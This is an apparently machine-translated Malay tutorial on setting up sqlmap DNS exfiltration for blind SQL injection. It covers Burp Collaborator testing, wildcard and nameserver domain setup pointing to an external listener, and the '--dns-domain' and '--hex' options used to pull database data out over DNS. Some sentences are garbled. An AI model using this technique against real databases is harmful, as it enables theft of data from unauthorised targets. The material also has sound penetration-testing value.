Apakah kaedah konfigurasi suntikan sqlmap _dns?

Terdapat terlalu sedikit artikel berkaitan tentang suntikan dns untuk sqlmap di Internet. Mereka hanya memperkenalkan secara ringkas parameter --dns-domain. Kunci belum dibawa oleh bos). Kemudian saya melakukannya sekali lagi dengan merujuk kepada kaedah di Internet.

Perkara yang perlu disediakan ialah satu sqlmap, windows blind injection, dua nama domain dan pelayan rangkaian luaran.

Suatu ketika saya sedang melakukan sesuatu, saya terjumpa suntikan buta masa Ia adalah mesin Windows, dan saya teringat kaedah suntikan dns.

Sebelum bermula, saya bercadang untuk menggunakan perintah --sql-shell sqlmap untuk menguji muatan suntikan dns

Mula-mula pergi ke klien kolaborator dalam burpsuite dan salin nama domain yang diberikan kepada kami oleh burp

Gunakan sqlmap untuk melaksanakan pernyataan sql

Sqlmap masih berjalan Permintaan telah diterima dalam burpsuite.

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net 352E362E3134 dalam

keputusan dikembalikan selepas .

Nyahkod untuk mendapatkan versi mysql. Nah, tidak salah dengan suntikan dns pada ketika ini.

Bersedia untuk mengkonfigurasi dua nama domain Beberapa artikel di Internet mengatakan bahawa satu adalah baik, tetapi ia sentiasa terasa lebih menyusahkan penyedia pelayan nama domain tidak menyediakan fungsi lanjutan tertentu, jadi lebih mudah untuk menyediakan dua .

www.a.com

www.b.com

Mula-mula kami mengkonfigurasi nama domain a-> a.com

Cuma tambah * untuk melaksanakan resolusi pan dan tuding ke IP pelayan rangkaian luaran kami.

Mari kita konfigurasikan nama domain kami b->b.com

Ini lebih mudah cuma ubah suai dns nama domain secara terus dan isikan ns1 .a.com ns2.a.com sudah memadai. Tidak perlu buat apa-apa lagi, isi sahaja.

Kemudian tunggu sehingga nama domain berkuat kuasa. Kami pergi ke pelayan rangkaian luaran untuk menguji sama ada penghuraian berjaya

Pelayan mula mendengar port 53

Kemudian komputer tempatan ping hello.b.com dan menghantarnya ke pelayan luaran Kami telah dapat menerima permintaan daripada hello.b.com, dan komputer tempatan menggesa bahawa hos tidak ditemui dan tidak. perlu diabaikan kerana kami belum menyediakan parsing. Setelah semuanya dikonfigurasikan, kita boleh menggunakan sqlmap untuk suntikan dns.

Tambah parameter --dns-domain=b.com --hex ke Sqlmap dan anda boleh

Pada langkah ini, sqlmap akan tersekat apabila diminta untuk menyediakan contoh pelayan DNS

dan terus ctrl+c

menggesa bahawa pengambilan data melalui DNS saluran berjaya.

Kelajuan suntikan adalah sepantas pelaporan ralat dan penyatuan, jadi anda tidak perlu menanggung ketinggalan lagi.

Atas ialah kandungan terperinci Apakah kaedah konfigurasi suntikan sqlmap _dns?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!